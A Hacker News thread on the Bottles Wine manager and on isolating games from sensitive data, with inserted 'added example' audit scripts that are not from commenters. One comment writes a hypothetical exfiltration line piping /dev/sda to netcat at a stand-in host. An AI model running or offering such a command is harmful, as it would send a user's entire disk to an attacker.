Bottles – Run Windows software and games on Linux (github.com/bottlesdevs)
174 points by maydemir on Feb 1, 2022 | 104 comments


Lutris, PlayOnLinux, Proton, etc. are all really cool. But, if you value your time and security, just keep a dedicated Windows system for gaming. I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.

The small price I pay for having to manually type a Steam authentication code from my phone into the gaming PC is worth it to never have to worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad. And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.

Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.


This makes no sense. So you value your security but then choose to go with a less secure operating system?

You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important.

In contrast on Windows most games run as Admin or at some point ask for admin privileges.

Running games on Linux is not about security or time savings. It's about control. It's about being able to sit down and play your game without Windows having a hissy fit about Windows updates. It's about being able to just play without worrying that some bad patch from Microsoft will hose your entire setup. And it's about finally wrestling control over gaming away from a company that cares more about taking your money than actually letting you play games you already have.

And the more people we get running Linux for gaming, the better off everyone will be for it.


Having an insecure os (not that I'd say that Windows is one) on a machine that does nothing else but gaming is still more secure than doing everything on the same machine.


> In contrast on Windows most games run as Admin

That's not true.

> or at some point ask for admin privileges.

Usually this is a UAC prompt so that the installer can deploy the game/app into Program Files. This isn't the fault of Windows and I'm fairly certain this could be avoided by the developer of the game/app.

> play your game without Windows having a hissy fit about Windows updates

You know you can defer updates and the nag? But then if you value your security then you'd install these updates (I lifted this from the start of your comment).

> without worrying that some bad patch from Microsoft will hose your entire setup

These are fairly rare, and I've personally never had it happen. I've hosed my Fedora install because the package manager really ballsed things up. But that was also a rare event.

I run both Windows and Linux and feel I'm happily in control of both OSes.


[flagged]


> You really don't have to run interference for Microsoft

I beg your pardon? I think you need to re-acquaint yourself with the HN Guidelines:

"Please don't post insinuations about astroturfing, shilling, bots, brigading, foreign agents and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data."

> Consider that games and accounts themselves are a high value target. Your League or WoW account alone can be worth hundreds to thousands and then some. Putting all your gaming eggs in one basket, so to speak, isn't that great.

I think even you can see the flaw in your argument there. It's the accounts that are at risk and it doesn't matter which platform you're using. A determined miscreant will get control and it doesn't matter a hoot whether you were running Windows, Linux, MacOS etc.


Compartmentalization as a security practice has value regardless of the OSes involved.

This would be true also if you split your use cases into two Linux instances.


> You can easily install all your games on another user on your linux box and run as that user.

No, you can't play all your games on linux. Anti cheat is one of the big problems for example.


No I think it makes some sense. You’re thinking in absolute terms. If you know everything and do everything right, your description may be better. But if you don’t want to be so careful all the time, wanting to relax and not need to think about security implications all the time, the setup above is quite good.

I carry out a similar mentality, I don’t trust Windows and hence I run things I don’t trust on Windows as well. Eg I only install Zoom native app on Windows but not on any other desktop OSes. Use Windows like it is a public machine, and you’ll have nothing to lose. (It is just an analogy, not to mean an exact statement, because you always have something to lose… just minimally here.)


> This makes no sense. So you value your security but then choose to go with a less secure operating system? You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important. In contrast on Windows most games run as Admin or at some point ask for admin privileges.

Reminds me of https://xkcd.com/1200/ ; why would running games as admin matter in the slightest if your actually sensitive data, ~/Documents, is not even on that computer? If it were on linux with another user, the game could still do `cat /dev/sda | nc evil.game.server` unlike here.


> If it were on linux with another user, the game could still do cat /dev/sda | nc evil.game.server unlike here.

That's not true. Only root can directly read a disk device, or a user that is in the 'disk' group:

brw-rw---- 1 root disk 8, 0 fev 1 07:50 /dev/sda


And of course a very easy to exploit bug that has been around for like 12 years hasn't gone public a few days ago because LPEs DO NOT EXIST IN LINUX.

I mean, it's quite obvious, exploitable bugs do not exist in Linux because back in the day Ken, Dennis, Brian, Doug and Joe agreed that they were not part of the Unix philosophy so they left them for windows to implement. /s

Aside from the stupid joke, what OP is saying is absolutely right, if you care about security keep your things properly isolated, keep a (whichever OS you trust but hopefully linux or a bsd) as main box and then a windows or macos computer isolated (best case scenario using a vlan capable switch, or a dedicated pi that acts as a firewall just for that box).


> You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important.

I have been told enough times that existence of RCE should be assumed as root access, because someone who can do RCE could probably do a PE too..


I game on linux, it's not as secure as I would like it to be. I run everything under unprivileged container including steam, the problem is that for vulkan hardware renderer to work it requires direct access to the device and the linux kernel doesn't virtualize device access. It's a security nightmare as far as I can see.


One issue with device virtualization is that the required hardware features are often locked out in non enterprise-grade hardware (although they can sometimes be unlocked, for example: https://github.com/DualCoder/vgpu_unlock).


FWIW Nvidia has removed some of these restrictions lately.


Amazing. Will have to try it then, as it is a bit annoying to have to restart to assign the card to a vm.


Thank you for that link. Does AMD have the same shenanigans of locking out consumer grade gpu's? Intel has GVT-g vGPU virtualization which works with intel integrated graphics, it will be interesting to see what road Intel takes with their dedicated GPUs.


Unfortunately, it seems that GVT-g is dead going forward. The word is it's not coming to the latest iGPUs and they plan to "replace it with SR-IOV" which isn't the same thing and I haven't even heard of anyone getting it to work anyway.

Really stinks because I was super interested in a GVT-g on their new discrete cards.


I might be misinformed, but my understanding is that consumer AMD cards, for the most part, do not have the required virtualization hardware at all, so there is nothing to unlock.


And as we all know, it's been ages[0] since the last local privilege escalation vulnerability on Linux.

[0] 4 days, to be exact - https://nvd.nist.gov/vuln/detail/CVE-2021-4034


A separate Linux user would go a long way. You'd have to be very unlucky to get hit by a RCE in a game that's simultaneously targeted at Proton users.


With PC gaming it's more of an issue of having to install all sorts of various software, including game mods, or the ever popular "hey try out my game" scams through discord. A popular one is distributing malicious unity assets. We don't realize that most of this stuff has little to no security, simply put just nobody exploits it. Dark souls series all had an online RCE and the game servers have been down for a while. I do not trust any of that near my dev environment. I've found a great separation is a PC with dual boot and a laptop with only Linux.


A RCE in Windows software running on WINE wouldn’t have much benefit on Linux unless the attacker specifically knew said software was running in WINE.

1. WINE et al run in a sandboxed environment. You cannot execute other Linux software without then also finding an RCE in WINE. So that’s multiple RCEs needed in multiple points of the stack and the attacker needs to be aware that you’re running the uncommon set up of that Windows software running in WINE.

2. The amount of Windows software installed in WINE is limited. So you don’t have a large attack surface of Windows software. That not only limits the amount an attacker can do in the sandbox but also limits the surface area that further RCEs might exist

3. Even if you could escape WINE you’re then stuck with the problem that you don’t know what the host OS is. So you’re stuck with generalised POSIX or GNU. Which might still be common but far far less common than going after Windows users.


> 1. WINE et al run in a sandboxed environment. You cannot execute other Linux software without then also finding an RCE in WINE. So that’s multiple RCEs needed in multiple points of the stack and the attacker needs to be aware that you’re running the uncommon set up of that Windows software running in WINE.

Are you sure about this? I was under the impression that there's nothing preventing an .exe running under Wine from just issuing Linux syscalls, eg. execve.

EDIT: I just tested this, and indeed there doesn't seem to be any sandboxing:

cursed.c: https://gist.github.com/q3k/e5952111283ea59ee78a7699919a055b

cursed.exe (built in msys2): https://object.ceph-eu.hswaw.net/q3k-personal/b8159d43e0698d...

  $ wine cursed.exe
  hello from win32
  hello from linux
  hello from execve


I stand corrected. Thanks for that detailed test too. I learned a lot from it


Not only isn't there any sandboxing, the lack of it is how WINE works - wine's low-level dlls (kernel32.dll for example) just call out to linux libs, or syscall directly.


Keep in mind that the Souls RCE exploit was unknown for many years, and the modding community rallied to get it to FromSoft's attention.

The modding community maintains its own 'anti-cheat' system called Blue Sentinel, which was updated day-of to block the RCE exploit. At least, the same day the warning was made in the Discord servers I'm still in.


Not really, because it requires very esoteric configurations to avoid other users reading important files of yours. Unless you're willing to modify your default SSH (and other, apache, etc.) configurations, the out-of-the-box setup will leave all your data readable by other users.


In the linux world it's standard operating procedure to make a separate user/group for every service and ensure the file system is cognizant of that. And the default in ubuntu runs mysql with mysql user and nginx / apache with www-data as a user.


That's correct, but if you want to keep any files that services like that access, such as SSH keys/authorized_keys you need to give them access to your directories. Because of this you can't make your home directory only readable by your user, since then sshd cannot access `~/.ssh` to check your authorized_keys file. The same is true for running a web server in `~/public_html` and anything else.

The agreed upon solution to this is to make the home directory readable, then split the files into a `~/public` and `~/private` directory, which is well accepted in the server space but completely non-adopted and not straightforward in the desktop space. It's technically possible to modify your $XDG_DATA_DIR and other similar configurations, but many programs and tools still don't care and will only look for and operate on configuration files in `~/.config` or `~/.local` or worse yet just `~/.foo`.
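As an added example (not code from any commenter in this thread), here is one way to check what a second local account could actually read in a home directory under classic Unix mode bits, which is the question behind both the `/dev/sda` listing and the home-directory permissions discussed above. The sample tree, the uid/gid numbers and the function names are constructed for illustration; ACLs, capabilities and SELinux/AppArmor policy are not modelled.

```python
import os
import stat
import tempfile


def class_bits(mode, owner_uid, owner_gid, uid, gids):
    """Return the rwx triplet (0-7) that classic Unix permissions grant.

    Exactly one class applies: owner, else group, else other.
    """
    if uid == 0:
        return 7  # simplification: root is treated as bypassing mode bits
    if uid == owner_uid:
        return (mode >> 6) & 7
    if owner_gid in gids:
        return (mode >> 3) & 7
    return mode & 7


def exposed_files(root, uid, gids):
    """List regular files under root that uid/gids could read by path.

    A file is exposed when its read bit applies AND every directory from
    root down to it grants search (x). Read permission on a directory is
    only needed to list names, so a 0711 directory still exposes files
    whose names can be guessed. Directories above root are assumed to be
    traversable; symlinks are skipped. Run this as the owner or as root so
    the walk itself can list every directory.
    """
    found = []
    stack = [root]
    while stack:
        directory = stack.pop()
        st = os.lstat(directory)
        if not class_bits(st.st_mode, st.st_uid, st.st_gid, uid, gids) & 1:
            continue  # no search permission: nothing below is reachable
        for name in os.listdir(directory):
            path = os.path.join(directory, name)
            est = os.lstat(path)
            if stat.S_ISDIR(est.st_mode):
                stack.append(path)
            elif stat.S_ISREG(est.st_mode):
                bits = class_bits(est.st_mode, est.st_uid, est.st_gid, uid, gids)
                if bits & 4:
                    found.append(os.path.relpath(path, root))
    return sorted(found)


def build_sample_home(base):
    """Create a constructed sample home tree under base and return its path."""
    home = os.path.join(base, "home_main")
    layout = {
        "notes.txt": 0o644,              # world-readable file in a 0755 home
        ".ssh/id_key": 0o644,            # readable bits, but parent is 0700
        "private/secret.txt": 0o600,     # owner-only file
        "private/guessable.txt": 0o644,  # parent 0711: reachable by name
    }
    for rel, mode in layout.items():
        path = os.path.join(home, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    os.chmod(os.path.join(home, ".ssh"), 0o700)
    os.chmod(os.path.join(home, "private"), 0o711)
    os.chmod(home, 0o755)
    return home


if __name__ == "__main__":
    # The block device line from the thread: brw-rw---- root disk.
    # gid 6 for 'disk' and uid/gid 1001 for the games account are constructed.
    print("games user on /dev/sda:", class_bits(0o660, 0, 6, 1001, {1001}))
    print("member of 'disk' group:", class_bits(0o660, 0, 6, 1001, {1001, 6}))

    with tempfile.TemporaryDirectory() as base:
        home = build_sample_home(base)
        games_uid = os.lstat(home).st_uid + 1  # any uid other than the owner
        print("home 0755:", exposed_files(home, games_uid, set()))
        os.chmod(home, 0o700)
        print("home 0700:", exposed_files(home, games_uid, set()))
```

Pointing `exposed_files` at a real home directory with the uid and group set of the games account shows what the separate-user setup leaves readable before any game is installed.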


You don't need Windows for security. If you want isolation, run another Linux separate from your main one and use Wine there all the same.

Windows and security is a poor combination to begin with.


This is the approach I use. Aside from my main account, I have a separate account for Steam, a separate account for Wine applications and another account for miscellaneous applications. I have an iptables rule that I use to selectively disable network traffic from applications I don't want/expect to communicate with the outside world and disable cron and atd to reduce the avenues for persistent applications.


> Lutris, PlayOnLinux, Proton, etc. are all really cool. But, if you value your time and security, just keep a dedicated Windows system for gaming. I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.

I agree with the part about running a dedicated system for gaming. I do the same but for creating music (I am not gaming).

On the other hand you don't need to do that on Windows so these tools still are useful.

I will add that if you have network segregation and firewalling between your main computer, your dedicated setup (gaming, whatever....) and the potential iot things running in your house it is even better.


> I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.

This was my plan too, but my intention was to keep the windows box offline 99% of the time (pretty much only connecting for downloads/installs). I still didn't like the idea of installing steam on the machine though since that would mean it's got my personal info on it and I'd be making purchases on it.

Now that steam thinks they can get a large number of games running on their Linux-based handheld shouldn't that mean most games should work on a linux desktop without much trouble? I'm hoping this means I can avoid windows 10/11 entirely.


Most games already do run with little or no problems. I recommend looking up games you are interested in on https://protondb.com to see how well you can expect them to run with Proton.


ProtonDB is really cool and I have been a big supporter (and contributor) over the last few years. The problem (and what you'll see if you look closer at the database) is that we have this giant elephant in the room in the Linux community named Nvidia. What works for an Intel/AMD GPU user may not work for an Nvidia user and the level of bugs associated with Nvidia on Linux is obscene. It sucks, and yeah, just buy AMD cards, but the reality is that Nvidia dominates the GPU space right now significantly and their cards seem to be a few generations ahead of AMD still.

Just a while ago for a CTF we implemented some hash breaking algorithms in OpenCL and CUDA and members of our team ran them on their own hardware. Firstly, we did it in Windows despite otherwise doing everything in Linux because the OpenCL/CUDA support and speed was leaps and bounds ahead on Windows. Next we compared the performance of hashes per second and it was orders of magnitude worse on AMD cards. We tweaked the algorithm a bit here and there to favor the AMD card and saw some minor gains, but overall we're talking a difference of 15/s versus 200/s in terms of how many hashes it was breaking per second.


You can just use a Windows-VM, and if you're concerned about performance, use PCIe passthrough for your graphics card.

Or use something like https://looking-glass.io/


> and if you're concerned about performance, use PCIe passthrough for your graphics card.

Won't work with NVIDIA cards at all without a boatload of hacks (because they don't want consumer cards to be used in virtualized environments), and AMD cards are an utter pain in the ass to work with because AMD can't be bothered to get basic PCI stuff to work [1].

Also, you always run the risk of some anti-cheat solution detecting your virtualization environment and banning you permanently.

If you value your sanity, don't do gaming inside a VM.

[1]: https://www.nicksherlock.com/2020/11/working-around-the-amd-...


> Won't work with NVIDIA cards at all without a boatload of hacks...

Actually the hack required to do this is quite minimal. This is the only thing I had to do to get the driver unblocked in win10/win11 for my rtx3070. I lifted this directly from https://mathiashueber.com/fighting-error-43-nvidia-gpu-virtu...

    <features>
      <hyperv>
        <vendor_id state='on' value='1234567890ab'/>
      </hyperv>
      <kvm>
        <hidden state='on'/>
      </kvm>
    </features>


Nvidia recently removed the driver check on consumer cards making them the clear choice now.

I've actually had good luck with AMD cards, but the reset bug is truly bizarre. For instance I own an evga R7 360, no reset bug, very reliable. I had also purchased an XFX R7 360, never survived a reboot! My sapphire RX 470 also works fine with no special actions from me and I've heard people have issues with that one.

You're definitely correct regarding anti-cheats though, they are something you have to watch out for.


I game on Windows but had to start using Linux/Wine/Lutris because some old games (but not that old) don't work on modern Windows versions.

I suppose once WSL2 GPU support improves I will be running Wine over WSL2 :)


It would be enough to just have a separate account for gaming if the games I am interested in did not require admin privileges.


I also keep my Windows gaming PC only for gaming. Reinstall it regularly, because this is the Windows way.

I have a DisplayPort USB KVM switch to quickly switch monitor, headphones, mouse and keyboard between my mac mini (that I normally use) and the gaming PC.


"Reinstall it regularly, because this is the Windows way." When did you last use windows regularly? In the 9x era?


Win 7 and 10 have frequently run into issues where updates fail to install for goofy and often inexplicable reasons. It is easier and faster to just reinstall that garbage without wasting time troubleshooting.


This is exactly what I am doing (I also have my Win box on a walled off segment of my network). It does seem silly that my most powerful computer is a one-trick-pony, but I run my most demanding apps on Mac...


I've thought about doing something like this before, does your windows machine have its own keyboard, mouse and monitors or do you have some kind of switch involved? I haven't worked out a good way yet of using multiple monitors over two machines whilst sharing audio and input between the two


I have a USB switch, my keyboard and mouse go into the USB hub on my monitor, and that hub is switched between my laptop dock and my windows pc. The monitor input is changed on the monitor. A proper KVM would be easier but is also many times more expensive.

I use my laptop open though, so I can still control it when using the windows pc.

For audio, I use a simple 3.5mm splitter. They work in both directions, so with the right combination of male/female 3.5mm cables you can merge the audio for about $10. There are fancier audiophile solutions too.

Something like synergy (from symless, there are competitors and FOSS alternatives but I can’t remember their names) might be good for your use case, to carry over m/kb input to the non-windows machine.


Bunch of different options. I actually couldn't tell the difference in latency from through a monitor when I just used steam in home streaming / remote play as steam in box streaming / not really remote play.

I'd say in order of seamlessness: KVM switch or monitor input switch; Looking-glass; parsec, steam in home streaming.

I have a KVM switch as well but I kind of prefer to run things in a window.

There's a couple quality of life things about running windows in a VM as well. When it goes on its update parade I can just close the window and ignore it. And with snapshotting a bad update can just be rolled back.


I have a Windows machine under the desk with no screen, keyboard etc. I connect remotely to Windows via https://parsec.app/ it is super fast, it needs like 20ms via Ethernet (https://www.youtube.com/watch?v=DksBBlHzulY). As long as you are no cs-pRogAMer you will be just fine and can access your full windows environment without the hardware hassle. The fullscreen encoding quality in H.256 is also pretty decent.

It also works via Internet out of the box with any shitty office notebook ;)


if you're competitive and want low latency/high framerate: you can do all of this with a single cheap USB physical switch (about $2 on ali express), plus DDC to switch monitor inputs automatically

I have this hooked up, so that I push the switch and the monitor inputs automatically switch

I also have a (cheap) physical audio mixer to do the audio, but you can do the same thing with pulseaudio and a line-in cable from one computer to another


The security concern is very very valid. It is surprising how well wine&co run windows malware considering that they were (probably) never specifically meant nor tested for that.


> Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content

Chrome did it before it became mainstream.


> if you value your time and security, just keep a dedicated Windows system for gaming

Not everyone has the space and money for this. In fact most people don't and when you buy a powerful PC for games you most likely also want to use it for your other PC tasks too - especially if you are a developer. Even if one has both the space and money, they may just not want to "task switch" between different machines (e.g. i do have a bunch of computers in my place but 99% of the time i use just one). Also switching between games and work in a different virtual desktop or whatever is way faster and more convenient than even rolling your chair to some other desk to another PC.

> I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.

Neat, but the same applies if you are running games under Wine since everything is running under Linux and not Windows. You do not even need to have Windows installed. If you are too paranoid to even touch an EXE because it might access other stuff in your home directory you can run the games under a different user with access only to that user's files.

> worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad. And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.

If you do not trust a developer it is much easier and safer to not download and run the game. If there is any issue with the game, it'll be quickly figured out. It is not any different than a game targeting Linux or really any other piece of software.

> Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.

This is what pretty much EVERY software - game related or not - for pretty much EVERY OS that has some form of automatic updates does! Singling out Windows games is a bit of a double standard when your browser could be updated right tomorrow with a brand new bug that enables sites to access your SSH keys (AFAIK this has actually happened with Firefox on Linux).

If anything, at least if you are playing singleplayer games, it is much easier to keep games to a known well working version when you stick with DRM-free games like those you can buy from GOG, Zoom Platform, GamersGate (not all are DRM-free there but there is a filter), Humble Bundle (similar case, not all are DRM-free), etc instead of Steam.

Though even if you stick with Steam, i doubt Valve (or any other game store) wants to distribute actual malware from their service and things will either be fixed or removed.


If you don't have the money or space what you can do is just have 2 hard drives, one fully encrypted running whichever OS you want and one with windows. Unplugging the secure one when booting into the insecure one would be ideal but not required. In this case you'd still be vulnerable to certain EFI based attacks but at least you'd be safe from most common crooks.

I mean, seriously, running stuff with wine is OK if your expectations are aligned with reality which is, you're running stuff there. If you complain about wine but then are completely fine with the typical 'curl XXX | bash' well, yeah, you're SoL but other than that some degree of separation is good.


I don't think there is a point in doing that, Windows isn't even running if you dual boot, why bother having 2 hard drives? Just place Windows in another partition.

But the point is to get rid of Windows completely without giving up the ability to play Windows games.


The point of having 2 drives is being able to better isolate your secure system.

If you physically unplug your secure drive then you know for sure that no fun stuff is going on behind your back.

I'm not entirely sure about secure boot when it comes to validating the boot loader of an installed system so I can't vouch for that but I do know that UEFI kits aside, unless you have a proper way to validate the secure system's boot loader it could be tampered with if the disk is accessible by a compromised system.

IMO the point is not to get rid of windows but to isolate whichever insecure system you use in a way in which it can't hurt the secure system (it could even be a secondary Linux system where you use Wine if that's what you want)


I use a gaming console (PS4) for similar reasons.


Sure but a console will never replace the joy of PC gaming


Sure but a dedicated Windows machine will never replace the joy of gaming on a FOSS OS. (;


I fully agree! However I do keep a Windows partition for some titles.


PC Gamer Master Race


Or better yet just buy a game console and don’t worry about any headaches :)


The problem with consoles is that your games library is basically hostage to the platform and the excessive DRM they have. With PC games you can play the games on any PC, current or future and especially if you stick with DRM-free games you can play the games years or even decades after they were out.

If you only care about playing a game now and then without caring what might happen in 4-5 years consoles might be ok, but i think that everyone eventually will find a game they'd like to be able to re/play 10+ years later on their current hardware and consoles make that hard.


I recently picked up a PS3 and it seems like in almost every game I play, even though by now most of those games are as patched as they're ever going to be, I keep finding bugs that could have been worked around if I'd been playing the PC version. If simple console commands (which so far have never been accessible on the PS3) couldn't solve the problem, often there's a mod someone wrote that would have. I guess the PS4 has a limited ability to use mods at least, so maybe that's improved the situation a little, but it's made me consider ditching playing anything on a console if PC is an option.

I'd have to say the console experience (circa 2013) is not at all without headaches.


This. Many moons ago I used to play on PC and had an extra SSD with Windows exclusively for that purpose. 4-5 years ago I decided to buy a XBOX and man, I've been so happy since then: Turn on and play, no having to mess with graphics configuration, no installations, no graphic card updates etc. I have to mention that I am casual gamer. Perhaps for a person who is really into gaming a PC provides more flexibility but that's not for me. PC for working and console for gaming.


Don't consoles have these ridiculous "subscriptions" that you need to "unlock" networking/multiplayer?


I use mods on all of the games I am interested in. Also, using controllers vs. KB+M is a horrible experience for me.


Paid multiplayer is the biggest scam ever


More fitting title would be "Easily manage wineprefix using environments" or "Easily manage wine prefixes in a new way" as this is just using Wine, which is what actually does the "Run Windows software and games on Linux" (current title) part.

If anyone has experience, and since the repository doesn't mention it, how is Bottles different from let's say Lutris, Q4Wine and PlayOnLinux that already exist and do something similar?


Not everyone understands what a 'wineprefix' even is.


Further to the point, I would hazard that the majority of linux users don't use wine because it's too complex to justify the effort. Very few users for this want to know how they would configure wine to do the same thing, they just want to 'run windows software and games on linux'.


I do the opposite, but for the exact same reason. I couldn't figure out how to use Lutris at all when I first installed Linux, but I happened upon a very detailed guide for setting up a wine prefix (it's just a folder) for the game I was installing. Now when I install a new game I mostly just scroll back through my shell history to see what I did back then.

I just opened Lutris for the first time since then and I think I can see how to use it now. But I'll probably stick to my current ways because it works and really all of it's a pain anyway. Lutris is still invaluable for peeking through the installer scripts, though.


I don't use Wine as there is no hole in my software landscape that an exclusively Windows application will fill.


This.

I've been using Linux for years, and the last time I had to mess with Wine prefixes I was super confused and it ended up not working (of course). :p

CrossOver and Proton ftw.


I feel like if this were targeted at everyone it would link to the marketing website or an article rather than the GitHub process. A bit of technical knowledge is a fair expectation for the Linux Hacker News audience.


That's fair. But even the quick description of the project is "Easily manage wineprefix using environments".


I find that Lutris is actually a pretty excellent experience. Most games have a method to install themselves with it, it integrates nicely with my GOG library, and it really does just work. You can edit the prefix dosdevices to deny access to the filesystem outside of the prefix.
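
An added example, not part of the thread or of Lutris: a check for the `dosdevices` point made in the comment above, listing the drive letters of a Wine prefix that resolve outside the prefix. The helper names and the sample prefix are constructed for illustration; the sample mirrors Wine's default `c:` and `z:` mappings.

```shell
#!/bin/sh
# Added example: report Wine drive letters that resolve outside the prefix.

# Build a throwaway prefix layout (constructed sample, not a real install):
# c: -> ../drive_c and z: -> / , the mappings Wine creates by default.
make_sample_prefix() {
    dir=$(mktemp -d) || return 1
    mkdir -p "$dir/drive_c" "$dir/dosdevices"
    ln -s ../drive_c "$dir/dosdevices/c:"
    ln -s / "$dir/dosdevices/z:"
    printf '%s\n' "$dir"
}

# Print "<drive> -> <resolved path>" for each dosdevices symlink whose
# target directory lies outside the prefix. Non-directory targets
# (for example device nodes) are skipped.
audit_dosdevices() {
    prefix=$(cd "$1" && pwd -P) || return 2
    for link in "$prefix"/dosdevices/*; do
        [ -L "$link" ] || continue
        target=$(cd "$prefix/dosdevices" && cd "$(readlink "$link")" 2>/dev/null && pwd -P) || continue
        case "$target/" in
            "$prefix"/*) ;;   # mapping stays inside the prefix
            *) printf '%s -> %s\n' "$(basename "$link")" "$target" ;;
        esac
    done
}

# Demo on the constructed prefix, then clean up.
sample=$(make_sample_prefix)
audit_dosdevices "$sample"
rm -rf "$sample"
```

Removing a reported link only removes that drive-letter mapping. Wine does not sandbox the programs it runs, so a separate user account or a real sandbox remains the actual boundary.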


AFAIK "bottle" is just a commonly used alias for a wine prefix. It predates this project.


It's a little "cleaner" than Lutris, but lacks the ecosystem of init scripts afaict.


"Cleaner" in what way? The UI? The workflow? How it deals with things on disk? Resource-usage-wise?


UI, and the way it presents options for your various wine settings (imo).


Recently posted (~1.5mo ago) with 237 comments.

https://news.ycombinator.com/item?id=29612976


I always disliked the concept of bottles as offered by CrossOver and probably the alternatives. I strongly prefer to have a single Windows subsystem with all the relevant DLLs installed and well-integrated with my Linux environment. Perhaps I never tried any particularly weird Windows apps/games but having them all in just one well-tweaked default "wineprefix" never caused a problem for me - apparently they don't conflict so unnecessary isolation means just unnecessary duplication of files and effort.


I use wine every single day, but never for gaming. I'm a 100% Linux user for over 15 years, but I have to admit that beyond the system config, package management and desktop (XFCE), I find Linux native apps on the desktop to be crap. Nothing in music land can touch MusicBee or mp3tag.de. I also just tried to rip a bunch of audio CDs and the default (and most recommended) ripper, 'Asunder', doesn't handle disc numbers. Seriously. EasyTag is anything but easy. It's like the developers never used any of the decent software available since the 90s on other platforms. So wine is a godsend, even if it is impossible to update without breaking a whole wine prefix. These days I bundle the wine version and the prefix together and don't bother upgrading them because it's just too brittle.


The best part of Bottles for those that like to tinker and contribute is their installer format.

Compared to alternatives like Lutris, it is nice to use and has little redundancy.


Is there an OSS equivalent of this for MacOS?



How does it compare with Crossover? Crossover is the only software I ever used where new MS Office works.


Crossover is the commercial version of WINE, which this is using.


It's not just that, it is also a prefix manager, which this is competing with.


This is a strange HN post (the parent, not yours). I recall playing with bottles and prefixes ... 10 years ago I think? Back when I was in my emulation craze and wanted to set up a huge swathe of games with WINE.


If you intend to use this, reach for the AppImage version. The AUR installation script appears to be broken, and the Flatpak version of the app is feature-incomplete (and, yunno, a Flatpak).


The download page says of Flatpak:

> This is the most supported and tested release of Bottles.

and AppImage:

> AppImage is broken, we are investigating, please use Flatpak in the meantime.


Parent is right though: Flatpak version doesn't allow the creation of .desktop files for Windows applications. It's a mysteriously silly decision, as you don't even get the option even if you manually give the flatpak the correct permissions.

Even worse: a bug in the Flatpak version prevents the launching of Windows applications directly from the commandline, so you can't even manually create .desktop files for it!


> and, yunno, a Flatpak

What's wrong with Flatpak? I've had fewer problems with flatpak than with AppImage personally.


The main challenge I have had with Flatpak is that for any apps that need to integrate with other components (e.g. I want my VS Code to use the same Node that I run from the Terminal) things get flaky. It's not so much that Flatpak does not support that kind of integration, but that many apps are not properly configured when packaged to take advantage of FP's integration features... End result is still a poor user experience. Moral of the story: don't just shove your code in a Flatpak and call it a day! Take the time to do it right.


Some people's opinion of Flatpak has been heavily warped by websites like FlatKill.org


It's even easier to warp your opinion of it by trying to daily-drive a Flatpak, you'll be begging for distro packages in no time!


Root access because I want to run a media player? No thanks!


VLC has access to your entire filesystem by default. Their sandboxing doesn't much care about that.


GNOME has a built-in method that allows you to set your own permissions on where in the filesystem a Flatpak can access, in addition to more fine-grained control like Flatseal. For most programs this means limiting its access to your Download directory or similar until portals become more widely adopted. There are also wrapper scripts you can use for when you double click a file it will temporarily give access to the file to VLC and revoke it afterwards - basically a poor man's portal.

Also you should look closer at what "your entire filesystem" means. There are a lot of areas of the file system that are completely blacklisted with no actual way to enable them regardless of configuration. Important things like /etc and /usr just to name a few.
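
An added example, not part of the thread: a check for the filesystem permissions discussed in the comments above, listing the broad grants in a Flatpak permissions keyfile (the format printed by `flatpak info --show-permissions <app-id>`). The application name, the helper names and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example: list broad filesystem grants in a Flatpak permissions keyfile.

# Write a constructed keyfile; $1 becomes the [Context] filesystems value.
# The [Environment] entry is a decoy to show only [Context] is inspected.
make_sample_metadata() {
    f=$(mktemp) || return 1
    cat > "$f" <<EOF
[Application]
name=org.example.Player

[Context]
shared=network;ipc;
sockets=x11;pulseaudio;
filesystems=$1

[Environment]
filesystems=host;
EOF
    printf '%s\n' "$f"
}

# Print each [Context] filesystems entry that grants the host tree or the
# whole home directory. Negated entries such as "!host" do not match.
broad_fs_grants() {
    awk -F= '
        /^\[/ { in_ctx = ($0 == "[Context]"); next }
        in_ctx && $1 == "filesystems" {
            n = split($2, e, ";")
            for (i = 1; i <= n; i++) {
                name = e[i]
                sub(/:.*/, "", name)      # drop :ro / :rw / :create suffix
                if (name ~ /^(host|host-os|host-etc|home|\/)$/) print e[i]
            }
        }
    ' "$1"
}

# Demo on a constructed file. A grant reported here can be narrowed with:
#   flatpak override --user --nofilesystem=host --filesystem=xdg-download <app-id>
demo=$(make_sample_metadata 'host;xdg-download:ro;')
broad_fs_grants "$demo"
rm -f "$demo"
```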


I use the flatpak version. What am I losing?


Unstable FS APIs, obfuscated data storage directories, and the app itself cannot generate launch shortcuts for any of your bottled programs.



